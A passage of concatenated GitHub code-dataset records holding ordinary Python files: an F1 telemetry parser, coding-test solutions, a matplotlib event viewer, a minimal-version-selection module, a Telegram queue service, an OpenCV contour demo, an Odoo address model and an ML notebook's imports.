Such fields would be impossible to query in the database otherwise.\n \"\"\"\n if isinstance(obj, dict):\n if any(_is_identifier(k) for k in obj):\n return [_add_key(_remove_key_identifiers(v), k) for k, v in obj.items()]\n else:\n return {k: _remove_key_identifiers(v) for k, v in obj.items()}\n elif isinstance(obj, list):\n return [_remove_key_identifiers(e) for e in obj]\n else:\n return obj\n\n\ndef _explode_arrays(collection_id: str, obj: Any,\n attributes: Optional[Dict] = None) -> Union[Any, List[Any]]:\n \"\"\"Transforms `obj` to remove arrays, because they could not be easily indexed\n and retrieved in the database.\n \"\"\"\n if attributes is None:\n attributes = {}\n else:\n attributes = {f'{k}_': v for k, v in attributes.items()}\n\n if isinstance(obj, list):\n res = []\n for i, e in enumerate(obj):\n attributes['idx'] = i\n _exploded = _explode_arrays(collection_id, e, attributes=attributes)\n if not isinstance(_exploded, list):\n _exploded = [_exploded]\n for j, _ in enumerate(_exploded):\n _exploded[j] = (_exploded[j][0], {'_val': _exploded[j][1]})\n for k, v in attributes.items():\n _exploded[j][1][f'_{k}'] = v\n res.extend(_exploded)\n return res\n\n elif isinstance(obj, dict):\n for k, v in obj.items():\n if not isinstance(v, list) and not isinstance(v, dict):\n attributes[k] = v\n\n exploded = []\n remaining = {}\n for k, v in obj.items():\n _exploded = _explode_arrays(f'{collection_id}-{k}', v, attributes=attributes)\n if isinstance(_exploded, list):\n exploded.extend(_exploded)\n else:\n remaining[k] = _exploded[1]\n \n if remaining and exploded:\n return [(collection_id, remaining)] + exploded\n elif not remaining and exploded:\n return exploded\n else:\n return (collection_id, remaining)\n\n else:\n return (collection_id, obj)\n\n\ndef _try_parse_date(s: str) -> Union[datetime, str]:\n \"\"\"Turns `s` into a datetime object if possible\"\"\"\n time = to_datetime(s)\n return time if time is not None else s\n\ndef _try_parse_number(s: str) -> Union[int, float, str]:\n \"\"\"Turns `s` into a number (int or float) if possible\"\"\"\n try:\n return int(s)\n except ValueError:\n try:\n return float(s)\n except ValueError:\n return s\n\ndef _try_parse_boolean(s: str):\n \"\"\"Turns `s` into a boolean if possible\"\"\"\n if s.lower() == 'true':\n return True\n elif s.lower() == 'false':\n return False\n else:\n return s\n\n@lru_cache(maxsize=None)\ndef _cast(s: str) -> Union[str, datetime, bool, int, float]:\n \"\"\"Casts `s` to the most specific type possible (str, datetime, bool, int or float)\"\"\"\n s = _try_parse_date(s)\n if isinstance(s, datetime):\n return s\n s = _try_parse_boolean(s)\n if isinstance(s, bool):\n return s\n return _try_parse_number(s)\n\ndef cast(obj: Any) -> Any:\n \"\"\"Casts `obj` to the most specific type possible, recursively\"\"\"\n if isinstance(obj, str):\n return _cast(obj)\n elif isinstance(obj, dict):\n return {k: cast(v) for k, v in obj.items()}\n elif isinstance(obj, list):\n return [cast(e) for e in obj]\n else:\n return obj\n\n\ndef _flatten_list(obj: Any) -> Iterator[Any]:\n if isinstance(obj, list):\n for e in obj:\n yield from _flatten_list(e)\n else:\n yield obj\n\n\ndef _apply_custom_transformations(topic: str, data: Dict) -> None:\n \"\"\"Transforms some raw data for storage optimization\"\"\"\n if topic == 'CarData.z': # This topic has a very large memory footprint in the database\n for elem in data:\n for entry in elem['Entries']:\n new_cars = []\n for old_car in entry['Cars']:\n new_car = {k: v for k, v in old_car.items() if k 
!= 'Channels'}\n                    for channel in old_car['Channels']:\n                        new_car[f'ch_{channel[\"_key\"]}'] = channel['_val']\n                    new_cars.append(new_car)\n                \n                entry['Cars'] = new_cars\n\n\ndef parse_line(topic: str, content: str, session_key: str, meeting_key: str, time: datetime,\n               session_time: Optional[float] = None) -> Dict[str, Dict]:\n    \"\"\"Parses a single raw line of F1 data.\n\n    This function decodes and transforms a raw F1 data line into a more\n    structured and usable format for indexing into MongoDB.\n    \"\"\"\n    decoded = _decode(content) if isinstance(content, str) else content\n    flattened = list(_flatten_list(_remove_key_identifiers(decoded)))\n\n    _apply_custom_transformations(topic=topic, data=flattened)\n\n    parsed = defaultdict(list)\n    for content in flattened:\n        # Explode\n        exploded = _explode_arrays(topic, content)\n        if not isinstance(exploded, list):\n            exploded = [exploded]\n\n        for collection_id, data in exploded:\n            if not data:\n                continue\n            data = cast(data)\n\n            # Add metadata\n            data['_time'] = time\n            data['_session_key'] = session_key\n            data['_meeting_key'] = meeting_key\n            if session_time:\n                data['_session_time'] = session_time\n\n            parsed[collection_id].append(data)\n\n    return dict(parsed)\n","repo_name":"br-g/openf1","sub_path":"ingestor/parsing.py","file_name":"parsing.py","file_ext":"py","file_size_in_byte":7840,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"}
{"seq_id":"7937593701","text":"# 1\nuser_age, max_heartrate = 0, 0\nprint_list = [0 for _ in range(6)]   # max, high, moderate, focus, warm-up, rest\n\nwhile True:\n    if user_age:\n\n        try:\n            cur = float(input())\n        except EOFError:\n            break\n\n        if max_heartrate * 90 / 100 <= cur:\n            print_list[0] += 1\n        elif max_heartrate * 80 / 100 <= cur:\n            print_list[1] += 1\n        elif max_heartrate * 75 / 100 <= cur:\n            print_list[2] += 1\n        elif max_heartrate * 68 / 100 <= cur:\n            print_list[3] += 1\n        elif max_heartrate * 60 / 100 <= cur:\n            print_list[4] += 1\n        else:\n            print_list[5] += 1\n\n    else:  # if age is not set yet\n        user_age = int(input())\n        max_heartrate = 220 - user_age\n\nfor e in print_list:\n    print(e, end=' ')\n\n\n# 2\nimport sys\nsys.stdin = open('input.txt', 'r')\n\nN = int(input())\nL = [list(map(int, input().split())) for _ in range(N)]\nCL = [[0 for _ in range(N)] for _ in range(N)]\n\ndir = [(-1, 0), (0, 1), (1, 0), (0, -1)]  # up, right, down, left\nL[0][0] = 2  # water\nL[N-1][N-1] = 7  # Honghyeon\n\ntime, res = 0, 0\nwater = [(0, 0)]\ncur_p_loca = [(N - 1, N - 1)]\n\n\ndef splash(L, water):\n    cnt = 0\n    cur_water = []\n    for x in water:\n        cur_water.append(x)\n\n    while cur_water:\n        i, j = cur_water.pop(0)\n        for ii, jj in dir:\n            ii = ii + i\n            jj = jj + j\n            if 0 <= ii < N and 0 <= jj < N:\n                if L[ii][jj] == 0 or L[ii][jj] == 7:\n                    L[ii][jj] = 2\n                    cur_water.append((ii, jj))\n\n    for y in range(N):\n        for x in range(N):\n            if L[y][x] == 0 or L[y][x] == 7:\n                cnt += 1\n    return cnt\n\n\nwhile cur_p_loca:\n    new_water = []\n    while water:\n        a, b = water.pop(0)\n        for aa, bb in dir:\n            aa = aa+a\n            bb = bb+b\n            if 0 <= aa < N and 0 <= bb < N:\n                if L[aa][bb] == 0 or L[aa][bb] == 7:\n                    L[aa][bb] = 2\n                    new_water.append((aa, bb))\n    water = new_water\n\n    i, j = cur_p_loca.pop(0)\n    for ii, jj in dir:\n        ii = ii+i\n        jj = jj+j\n        if 0 <= ii < N and 0 <= jj < N:\n            if L[ii][jj] == 0:\n                L[ii][jj] = 3\n\n                for y in range(N):\n                    for x in range(N):\n                        CL[y][x] = L[y][x]\n\n                cnt = splash(CL, water)\n                if cnt > res:\n                    res = cnt\n\n                L[ii][jj] = 7\n                cur_p_loca.append((ii, jj))\n\n            elif L[ii][jj] == 1:\n                L[ii][jj] = 8\n                cur_p_loca.append((ii, 
jj))\nprint(res)","repo_name":"anyl92/ALGORITHM","sub_path":"test/200829_brandi.py","file_name":"200829_brandi.py","file_ext":"py","file_size_in_byte":2646,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"25661567854","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.widgets as WID\nimport matplotlib.colors\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\nimport sys\n#plt.style.use('presentation')\n\n\nFileName=sys.argv[-1]\nif FileName=='EventPlotter.py':\n print(\"Tell me a file to use!\")\n exit()\nm=np.load(FileName)\npe_MAX=0\nfor i in range(len(m)):\n for j in range(len(m[i])):\n for k in range(len(m[i][j])):\n if pe_MAX <= m[i][j][k]:\n pe_MAX=m[i][j][k]\n if m[i][j][k]==0:\n m[i][j][k]=np.nan\ngtu=0\n#sets up canvas \nfig =plt.figure()\nfig.set_figheight(9)\nfig.set_figwidth(16)\nax = fig.add_axes([0.05,0.05,0.9,0.9])\n\n\n \ndelta_gtu = 1\nmax_GTU=len(m)\naxcolor = 'lightgoldenrodyellow'\naxslidder = plt.axes([0.15, 0.05, 0.55, 0.03], facecolor=axcolor)\naxbuttona = plt.axes([0.75, 0.05, 0.05, 0.03], facecolor=axcolor)\naxbuttonb = plt.axes([0.05,0.05,0.05,0.03],facecolor=axcolor)\naxtxt = plt.axes([0.85,0.05,0.05,0.03],facecolor=axcolor)\nslider = WID.Slider(axslidder, '', 1, max_GTU, valinit=gtu, valstep=delta_gtu,valfmt= \"%1d\")\nbuttona = WID.Button(axbuttona,'Next')\nbuttonb = WID.Button(axbuttonb,'Prev')\ntext_box= WID.TextBox(axtxt,'',initial=str(gtu))\nnorm=plt.Normalize(1,pe_MAX/2.0)\ndivider = make_axes_locatable(ax)\ncax = divider.append_axes(\"right\", size=\"5%\", pad=0.05)\n\nim=ax.imshow(m[0], norm=norm,origin='lower',cmap='YlOrBr')\nax.set_xlabel('X Pixel')\nax.set_ylabel('Y Pixel')\nax.set_title('GTU '+str(gtu))\nfig.colorbar(im,orientation='vertical',cax=cax,label='PE/pix')\n\ndef s_update(val):\n global gtu\n gtu=int(slider.val)\n ax.clear()\n ax.imshow(m[gtu-1], norm=norm,origin='lower',cmap='YlOrBr')\n ax.set_xlabel('X Pixel')\n ax.set_ylabel('Y Pixel')\n ax.set_title('GTU '+str(gtu))\n plt.draw() \n\ndef b_updatea(self):\n global gtu\n if gtu <max_GTU:\n gtu+=1\n slider.set_val(gtu)\n ax.clear()\n ax.imshow(m[gtu-1], norm=norm,origin='lower',cmap='YlOrBr')\n ax.set_xlabel('X Pixel')\n ax.set_ylabel('Y Pixel')\n ax.set_title('GTU '+str(gtu))\n plt.draw()\n \ndef b_updateb(self):\n global gtu\n if gtu>0:\n gtu-=1 \n slider.set_val(gtu)\n ax.clear()\n ax.imshow(m[gtu-1], norm=norm,origin='lower',cmap='YlOrBr')\n ax.set_xlabel('X Pixel')\n ax.set_ylabel('Y Pixel')\n ax.set_title('GTU '+str(gtu))\n plt.draw()\n\ndef text_update(text):\n global gtu\n gtu = int(text)\n slider.set_val(gtu)\n ax.clear()\n ax.imshow(m[gtu-1], norm=norm,origin='lower',cmap='YlOrBr')\n ax.set_xlabel('X Pixel')\n ax.set_ylabel('Y Pixel')\n ax.set_title('GTU '+str(gtu))\n plt.draw()\n\nslider.on_changed(s_update)\nbuttona.on_clicked(b_updatea)\nbuttonb.on_clicked(b_updateb)\ntext_box.on_submit(text_update)\nplt.show()\n \n","repo_name":"AstroGroupCSM/SPB2Reconstruction","sub_path":"WeidBehaviorInspector/EventPlotter.py","file_name":"EventPlotter.py","file_ext":"py","file_size_in_byte":2772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38996131888","text":"from collections import defaultdict, deque\nfrom dataclasses import dataclass, field\nfrom typing import Callable, Iterable, List, MutableMapping, MutableSet, Optional\n\nfrom typing_extensions import Protocol\n\nfrom . 
import brick\n\n\nclass Reqs(Protocol):\n \"\"\"The requirement graph on which Minimal Version Selection (MVS)\n operates.\n\n The version strings are opaque except for the special version\n `\"none\"` (see the documentation for `brick.Brick`). In particular,\n MVS does not assume that the version strings are semantic versions;\n instead, the `max` method gives access to the comparison operation.\n\n \"\"\"\n\n # pylint: disable=no-self-use,unused-argument\n\n def required(self, brk: brick.Brick) -> Iterable[brick.Brick]:\n \"\"\"Return the brick versions explicitly required by `brk`.\"\"\"\n ... # pragma: no cover\n\n def max(self, ver1: str, ver2: str) -> str:\n \"\"\"Returns the maximum of `ver1` and `ver2` (return either\n `ver1` or `ver2`).\n\n For all versions `ver`, `max(ver, \"none\")` must be `ver`, and\n for the `target` passed as the first argument to MVS functions,\n `max(target, ver)` must be `target`.\n\n \"\"\"\n ... # pragma: no cover\n\n def upgrade(self, brk: brick.Brick) -> brick.Brick:\n \"\"\"Returns the upgraded version of `brk`, for use during an\n `upgrade_all` operation.\n\n If `brk` should be kept as is, returns `brk`.\n More typically, `brk.version` will be the version required by\n some other module in the build.\n\n \"\"\"\n ... # pragma: no cover\n\n def previous(self, brk: brick.Brick) -> brick.Brick:\n \"\"\"Returns the version of `brk.name` immediately prior to\n `brk.version`, or `\"none\"` if no such version is known.\n\n\n \"\"\"\n ... # pragma: no cover\n\n\ndef build_list(\n target: brick.Brick,\n reqs: Reqs,\n upgrader: Optional[Callable[[brick.Brick], brick.Brick]] = None,\n) -> Iterable[brick.Brick]:\n \"\"\"Return the build list for the target brick.\n\n The first element is the target itself, with the remainder of the\n list sorted by name.\n\n \"\"\"\n\n @dataclass(unsafe_hash=True)\n class Node:\n brk: brick.Brick = field(hash=True)\n required: Iterable[brick.Brick] = field(default_factory=list, hash=False)\n\n graph: MutableMapping[brick.Brick, Node] = {}\n mins: MutableMapping[str, str] = {} # map brick name to minimum required version\n todo, done = deque([target]), set()\n while todo:\n # pylint: disable=broad-except\n curr = todo.popleft()\n done.add(curr)\n node = Node(curr)\n graph[curr] = node\n if (\n curr.name not in mins\n or reqs.max(mins[curr.name], curr.version) != mins[curr.name]\n ):\n mins[curr.name] = curr.version\n node.required = reqs.required(curr)\n todo.extend(r for r in node.required if r not in done)\n if upgrader:\n upg = upgrader(curr)\n if upg not in done:\n todo.append(upg)\n\n # Construct the list by traversing the graph again, replacing older\n # bricks with required minimum versions.\n todo, res = deque([target]), [target]\n processed = {target.name}\n while todo:\n curr = todo.popleft()\n for req_ in graph[curr].required:\n ver = mins[req_.name]\n if req_.name != target.name:\n assert reqs.max(ver, req_.version) == ver\n if req_.name not in processed:\n res.append(brick.Brick(req_.name, ver))\n todo.append(res[-1])\n processed.add(req_.name)\n return [res[0]] + sorted(res[1:], key=lambda b: b.name)\n\n\ndef req(\n target: brick.Brick, blist: Iterable[brick.Brick], base: Iterable[str], reqs: Reqs\n) -> Iterable[brick.Brick]:\n \"\"\"Return the minimal requirement list for the target brick that\n results in the given build list, with the constraint that all brick\n names listed in base must appear in the returned list.\n\n \"\"\"\n # Compute postorder, cache requirements.\n postorder: List[brick.Brick] = []\n 
cache: MutableMapping[brick.Brick, Iterable[brick.Brick]] = {target: []}\n\n def walk(brk: brick.Brick):\n if brk in cache:\n return\n required = reqs.required(brk)\n cache[brk] = required\n for req_ in required:\n walk(req_)\n postorder.append(brk)\n\n for brk in blist:\n walk(brk)\n\n # Walk bricks in reverse post-order, only adding those not implied\n # already.\n have: MutableMapping[str, str] = {}\n\n def reverse_walk(brk: brick.Brick):\n if brk.name in have and reqs.max(brk.version, have[brk.name]) == have[brk.name]:\n return\n have[brk.name] = brk.version\n for req_ in cache.get(brk, []):\n reverse_walk(req_)\n\n # Sanitize the given build list searching for duplicates.\n maxs: MutableMapping[str, str] = {}\n for brk in blist:\n if brk.name in maxs:\n maxs[brk.name] = reqs.max(brk.version, maxs[brk.name])\n else:\n maxs[brk.name] = brk.version\n\n # First walk the base bricks that must be listed.\n mins: List[brick.Brick] = []\n for name in base:\n brk = brick.Brick(name, maxs.get(name, \"\"))\n mins.append(brk)\n reverse_walk(brk)\n # Now the reverse postorder to bring in anything else.\n for brk in postorder[::-1]:\n if maxs.get(brk.name, \"\") != brk.version:\n # older version\n continue\n if have.get(brk.name, \"\") != brk.version:\n mins.append(brk)\n reverse_walk(brk)\n return sorted(mins, key=lambda b: b.name)\n\n\ndef upgrade_all(target: brick.Brick, reqs: Reqs) -> Iterable[brick.Brick]:\n \"\"\"Return a build list for the target brick in which every brick is\n upgraded to its latest version.\n\n \"\"\"\n\n def _upgrade(brk: brick.Brick) -> brick.Brick:\n return target if brk.name == target.name else reqs.upgrade(brk)\n\n return build_list(target, reqs, _upgrade)\n\n\nclass _OverrideReqs:\n def __init__(\n self, target: brick.Brick, required: Iterable[brick.Brick], reqs: Reqs\n ):\n self._target = target\n self._required = required\n self._reqs = reqs\n\n def __getattr__(self, name):\n return getattr(self._reqs, name)\n\n def required(self, brk: brick.Brick) -> Iterable[brick.Brick]:\n return self._required if brk == self._target else self._reqs.required(brk)\n\n\ndef upgrade(\n target: brick.Brick, reqs: Reqs, *args: brick.Brick\n) -> Iterable[brick.Brick]:\n \"\"\"Return a build list for the target brick in which the given\n additional bricks are upgraded.\n\n \"\"\"\n required = list(reqs.required(target)) + list(args)\n return build_list(target, _OverrideReqs(target, required, reqs))\n\n\ndef downgrade(\n target: brick.Brick, reqs: Reqs, *args: brick.Brick\n) -> Iterable[brick.Brick]:\n \"\"\"Return a build list for the target brick in which the given\n additional bricks are downgraded.\n\n \"\"\"\n required = reqs.required(target)\n maxs: MutableMapping[str, str] = {r.name: r.version for r in required}\n for arg in args:\n if arg.name not in maxs or reqs.max(maxs[arg.name], arg.version) != arg.version:\n maxs[arg.name] = arg.version\n added: MutableSet[brick.Brick] = set()\n rdeps: MutableMapping[brick.Brick, List[brick.Brick]] = defaultdict(list)\n excluded: MutableSet[brick.Brick] = set()\n\n def exclude(brk: brick.Brick):\n if brk in excluded:\n return\n excluded.add(brk)\n for dep in rdeps.get(brk, []):\n exclude(dep)\n\n def add(brk: brick.Brick):\n if brk in added:\n return\n added.add(brk)\n if brk.name in maxs and reqs.max(brk.version, maxs[brk.name]) != maxs[brk.name]:\n exclude(brk)\n return\n for req_ in reqs.required(brk):\n add(req_)\n if req_ in excluded:\n exclude(brk)\n return\n rdeps[req_].append(brk)\n\n out: List[brick.Brick] = [target]\n for curr in 
required:\n add(curr)\n while curr in excluded:\n prev = reqs.previous(curr)\n ver = maxs.get(curr.name, \"\")\n if (\n reqs.max(ver, curr.version) != ver\n and reqs.max(prev.version, ver) != prev.version\n ):\n prev = brick.Brick(prev.name, ver)\n if prev.version == \"none\":\n break\n add(prev)\n curr = prev\n else:\n out.append(curr)\n return out\n","repo_name":"websebdev/cli","sub_path":"src/iccli/cmd/mvs.py","file_name":"mvs.py","file_ext":"py","file_size_in_byte":8618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19589401265","text":"from functools import cached_property\n\nfrom banners.models import Banner, QueueItemSource, BannerTelegram\nfrom shared.services.result import Success, Failure\nfrom telebot import types\n\n\nclass CalcPeopleAhead:\n def __init__(self, message, bot):\n self.message = message\n self.bot = bot\n\n def call(self):\n if not self.banner_telegram:\n return self.error_msg_and_failure(\n f\"unknown banner for the chat id: {self.message.chat.id}\"\n )\n\n if not self.banner:\n return self.error_msg_and_failure(\n 'banner not found'\n )\n\n if not self.queue_item:\n return self.error_msg_and_failure(\n 'queue item not found'\n )\n\n self.send_message_to_bot()\n\n return Success(self.queue_item)\n\n @cached_property\n def banner_telegram(self):\n return BannerTelegram.objects.filter(chat_id=self.message.chat.id).first()\n\n @cached_property\n def banner(self):\n return Banner.objects.filter(pk=self.banner_telegram.banner_id).first()\n\n @cached_property\n def queue_item(self):\n return self.banner.queue.actual().filter(telegram_chat_id=self.message.chat.id).first()\n\n @cached_property\n def people_ahead_count(self):\n return self.banner.queue.actual().filter(position__lt=self.queue_item.position).count()\n\n def send_message_to_bot(self):\n queue_msg = f\"There are {self.people_ahead_count} in front of you.\"\n\n markup = types.ReplyKeyboardMarkup(row_width=1)\n queue_length_btn = types.KeyboardButton('/check queue length')\n markup.add(queue_length_btn)\n self.bot.send_message(self.message.chat.id, queue_msg,\n reply_markup=markup)\n\n def error_msg_and_failure(self, failure_msg):\n self.bot.send_message(self.message.chat.id, failure_msg)\n return Failure(failure_msg)\n","repo_name":"Alexander-Andrade/qlapse","sub_path":"banners/services/queue_item_services/telegram_services/calc_people_ahead.py","file_name":"calc_people_ahead.py","file_ext":"py","file_size_in_byte":1928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26703499169","text":"#!/usr/local/bin/python3\n\n# WHAT DOES THIS SCRIPT DO? 
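\n# Note: the same check could also be written with pathlib (an untested sketch, standard library only):\n#   from pathlib import Path; p = Path(sys.argv[1]); print(p.is_file(), p.is_dir())\n# Also note that subprocess is imported below but never used.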
\n# This script will check if the provided filename or dirname is present\n\nimport os.path\nimport sys\nimport subprocess\n\n# Get arguments into a list called \"args\"\nargs = sys.argv\n\nif len(args) == 2:\n    if os.path.isfile(args[1]):\n        print(\"The File \", args[1], \" does exist on this system\", sep=\" \")\n    elif os.path.isdir(args[1]):\n        print(\"The Directory \", args[1], \" does exist on this system\", sep=\" \")\n    else:\n        print(\"the requested file or directory does not exist on this system\")\nelse:\n    print(\"usage (only 2 arguments): EXAMPLE => python3 ispresent.py [directory or file absolute path]\")","repo_name":"sysadmin-exe/pythontooling","sub_path":"ispresent.py","file_name":"ispresent.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15222557650","text":"X, Y = map(int, input().split())\nZ = int(Y*100/X)\n\ndef bs(left, right):\n    if left >= right:\n        return left\n    mid = (left+right)//2\n    if int((Y+mid)*100/(X+mid)) == Z:\n        return bs(mid+1,right)\n    else:\n        return bs(left,mid)\nif Z == 99 or Z == 100:\n    print(-1)\nelse:\n    print(bs(1,X))","repo_name":"danny6883/algorithm","sub_path":"BOJ/boj1072.py","file_name":"boj1072.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13060752504","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n\n# https://www.hackerrank.com/challenges/one-month-preparation-kit-maxsubarray/problem\n# Complete the 'maxSubarray' function below.\n#\n# The function is expected to return an INTEGER_ARRAY.\n# The function accepts INTEGER_ARRAY arr as parameter.\n#\n\ndef maxSubarray(arr):\n    # Write your code here\n    curr_sum = -math.inf\n    best_sum = -math.inf\n\n    for x in arr:\n        curr_sum = max(x, curr_sum + x)\n        best_sum = max(best_sum, curr_sum)\n\n    non_neg_arr = [x for x in arr if x >= 0]\n    if len(non_neg_arr) > 0:\n        subarr_summ = sum(non_neg_arr)\n    else:\n        subarr_summ = max(arr)\n\n    return best_sum, subarr_summ\n\n\nif __name__ == '__main__':\n    fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n    t = int(input().strip())\n\n    for t_itr in range(t):\n        n = int(input().strip())\n\n        arr = list(map(int, input().rstrip().split()))\n\n        result = maxSubarray(arr)\n\n        fptr.write(' '.join(map(str, result)))\n        fptr.write('\\n')\n\n    fptr.close()\n","repo_name":"shurupyan/hacker-rank-python-training","sub_path":"one_month_preparation_kit/maxsubarray.py","file_name":"maxsubarray.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71645752748","text":"# The answer I wrote -> time limit exceeded\nimport sys\nN, S = map(int, sys.stdin.readline().split())\narr = list(map(int, sys.stdin.readline().split()))\nMcnt = N\na = 0\nwhile a < N:\n    dp = 0\n    cnt = 0\n    for i in range(a, len(arr)):\n        dp += arr[i]\n        cnt += 1\n        if dp >= S:\n            Mcnt = min(cnt, Mcnt)\n    a += 1\nprint(Mcnt)\n# Doing it like this computes every possible partial sum, so it is inefficient and takes a lot of time!\n# We need a way to derive only the contiguous sums that are at least S (and with as few elements in the subarray as possible)\n\n# For reference\nimport sys\nN, S = map(int, sys.stdin.readline().split())\narr = list(map(int, input().split()))\nMcnt = N+1\nsum = [0] * (N + 1)\nfor i in range(1, N + 1):\n    sum[i] = sum[i-1] + arr[i-1]\nstart = 0\nend = 1\nwhile start != N:\n    if sum[end]-sum[start] >= S:\n        if Mcnt > end - start:\n            Mcnt = end- start\n        start += 1\n    else:\n        if end != N:\n            end += 1\n        else:\n            start += 1\nif Mcnt != N+1:\n    print(Mcnt)\nelse:\n    print(0)\n\n\n# First, build a prefix-sum list so that sum[i] holds the total of the numbers from index 0 up to the i-th one\n# A subarray sum can then be recovered as sum[N] - sum[M], which corresponds to arr[M:N]\n# The important thing is that this is a two-pointer technique!\n# By keeping start and end pointers and running only until both values reach N, we still get the desired answer!\n
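# Worked example: with N=10, S=15, arr=[5, 1, 3, 5, 10, 7, 4, 9, 2, 8], the shortest window whose sum reaches 15 is [10, 7] (sum 17), so the answer is 2.\n# Since start and end only ever move forward, the scan is O(N), versus the O(N^2) enumeration of the first attempt.\n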
","repo_name":"psy-choi/Quiz-of-Data-structures","sub_path":"BJ1806.py","file_name":"BJ1806.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33322381359","text":"from lxml import etree\n\nfrom odoo import models, api, fields\nfrom odoo.tools.translate import _\n\n\nclass ResCompany(models.Model):\n    _inherit = \"res.company\"\n\n    district_id = fields.Many2one(comodel_name='res.country.district', string='District',\n                                  domain=\"[('state_id','=', state_id)]\")\n    ward_id = fields.Many2one(comodel_name='res.country.ward', string='Ward',\n                              domain=\"[('district_id', '=', district_id)]\")\n\n    def _makeaddress(self, ward_name=\"\", district_name=\"\"):\n        if (ward_name != False and district_name != False):\n            return (str(ward_name) + \", \" + str(district_name))\n        else:\n            return \"\"\n\n    @api.onchange('district_id')\n    def _district_onchange(self):\n        self.street2 = self.district_id.name\n        self.ward_id = False\n        self.city = self.state_id.name\n\n    @api.onchange('ward_id')\n    def _ward_onchange(self):\n        self.street2 = self.ward_id.slug2\n        self.city = self.state_id.name\n\n    @api.onchange('state_id')\n    def _onchange_state_id(self):\n        if self.state_id:\n            self.city = self.state_id.name\n            self.district_id = False\n            self.ward_id = False\n            # self.zip = self.state_id.zipcode\n        elif self._origin:\n            self.district_id = False\n            self.ward_id = False\n            self.city = False\n            self.zip = False\n\n    # @api.model\n    # def _address_fields(self):\n    #     \"\"\"Returns the list of address fields that are synced from the parent.\"\"\"\n    #     return super(ResCompany, self)._address_fields() + ['state_id', ]\n\n\n    @api.model\n    def _default_get(self, default_fields):\n        \"\"\"Set default value by fields \"\"\"\n        values = super(ResCompany, self)._default_get(default_fields)\n        values.update({\n            \"default_website\": \"https://\",\n            \"default_country_id.id\": 241,\n        })\n        return values\n","repo_name":"beanfamily/beanfamily_odoo_addons","sub_path":"bean_address/models/res_company.py","file_name":"res_company.py","file_ext":"py","file_size_in_byte":1954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3109724273","text":"import cv2 as cv\nimport numpy as np\n'''\nContour approximation\nUses the Douglas-Peucker algorithm\ncv.approxPolyDP()\nRebuilds the original contour's shape as a new contour made of fewer points\nSecond parameter (epsilon): the maximum distance from the original contour to the approximated contour\nIt is an accuracy parameter\nReturns a list made up of points on the contour\n'''\nimgx = cv.imread('ww.jpg')\nimg = cv.imread('ww.jpg',0)\nret,thresh = cv.threshold(img,127,255,0)\nret,contours,hierarchy = cv.findContours(thresh,1,2)\n\ncnt = contours[0]\n\nepsilon = 0.01*cv.arcLength(cnt,True)\n#epsilon = 0.1*cv.arcLength(cnt,True)\napprox = cv.approxPolyDP(cnt,epsilon,True)\n\nprint('epsilon',epsilon)\nprint('approx',approx)\n\n# Draw all the points that make up the approximated contour\nfor i in range(len(approx)):\n\tcv.circle(imgx,(approx[i,0,0],approx[i,0,1]),5,(0,255,0),2)\n\ncv.imshow('imgx',imgx)\ncv.waitKey(0)","repo_name":"liuzijie23/cv_code","sub_path":"cv6/cv_8.py","file_name":"cv_8.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"12042485287","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport json\nimport numpy as np\nimport pandas as pd\nfrom 
datetime import datetime\nfrom time import gmtime, strftime\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.decomposition import TruncatedSVD\nimport random\nimport os\nimport re\nimport json\nimport numpy as np\nimport pandas as pd\nimport lightgbm as lgbm\nfrom datetime import datetime\nfrom time import gmtime, strftime\nfrom scipy import stats\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.decomposition import TruncatedSVD\n\nimport lightgbm\nfrom sklearn.model_selection import StratifiedKFold, KFold\nfrom sklearn.metrics import f1_score, mean_absolute_error, mean_squared_error\n\nfrom gensim.models import KeyedVectors\nfrom gensim.scripts.glove2word2vec import glove2word2vec\n\nimport json\nimport os\nimport numpy as np\nimport pandas as pd\nimport lightgbm as lgbm\nfrom datetime import datetime\nfrom time import gmtime, strftime\nfrom scipy import stats\nfrom PIL import Image\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.decomposition import TruncatedSVD\nfrom sklearn.model_selection import StratifiedKFold, KFold\nfrom sklearn.metrics import f1_score, mean_absolute_error, mean_squared_error\n\n\nrandom_seed = 2020\nrandom.seed(random_seed)\nnp.random.seed(random_seed)\n\n\n# In[2]:\n\n\ntrain_category = json.load(open('./data/train_all_json/train_category.json', encoding=\"utf-8\"))\ntrain_category_pd = pd.DataFrame(train_category)\n\ntrain_additional = json.load(open('./data/train_all_json/train_additional.json', encoding=\"utf-8\"))\ntrain_additional_pd = pd.DataFrame(train_additional)\n\ntrain_tags = json.load(open('./data/train_all_json/train_tags.json', encoding=\"utf-8\"))\ntrain_tags_pd = pd.DataFrame(train_tags)\n\ntrain_temporalspatial = json.load(open('./data/train_all_json/train_temporalspatial.json', encoding=\"utf-8\"))\ntrain_temporalspatial_pd = 